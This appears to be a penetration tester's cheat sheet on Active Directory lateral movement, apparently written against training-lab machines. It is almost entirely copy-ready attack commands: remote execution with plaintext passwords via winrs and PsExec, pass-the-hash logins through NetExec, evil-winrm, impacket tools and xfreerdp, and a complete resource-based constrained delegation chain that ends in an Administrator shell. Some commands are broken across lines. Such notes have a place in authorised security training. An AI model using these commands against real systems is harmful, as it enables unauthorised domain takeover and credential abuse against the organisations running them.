Lateral Movement AD
WinRM
PsExec
Pass the Hash
Overpass the Hash
Pass the Ticket
Persistence
impacket-addcomputer
Last updated
Last updated
# WinRS
winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
C:\Tools\SysinternalsSuite>hostname
client74
C:\Tools\SysinternalsSuite>.\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd
PsExec v2.4 - Execute processes remotely
C:\Windows\system32>hostname
FILES04# winrm
nxc winrm resourced.local -u users.txt -H hashes.txt
evil-winrm -i resourced.local -u L.Livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808'
# wmiexec
impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E [email protected]
# PsExec
impacket-psexec [email protected] -hashes :e728ecbadfb02f51ce8eed753f3ff3fd
# smb
nxc smb 10.10.14.14 -u user -H :e728ecbadfb02f51ce8eed753f3ff3fd --shares
# xfreerdp
xfreerdp /v:10.10.14.14 /u:user /d: /pth:e728ecbadfb02f51ce8eed753f3ff3fd
# mssql
impacket-mssqlclient -windows-auth -hashes :e728ecbadfb02f51ce8eed753f3ff3fd [email protected]# Add new computer
impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.179.175 -
hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'qais' -computer-pass 'qais'
# https://github.com/tothi/rbcd-attack/blob/master/rbcd.py
# Script to configure attribute ‘msDS-AllowedToActOnBehalfOfOtherIdentity’
python3 rbcd.py -dc-ip 192.168.179.175 -t RESOURCEDC -f 'qais' -
hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone
# Obtain a service ticket for the Administrator using SPN (Service Principal Name)
impacket-getST -spn cifs/resourcedc.resourced.local resourced/qais\$:'qais' -impersonate
Administrator -dc-ip 192.168.179.175
# Set the Kerberos credential cache as an environment variable
export KRB5CCNAME=./Administrator.ccache
# Connect using psexec with Kerberos auth
impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.179.175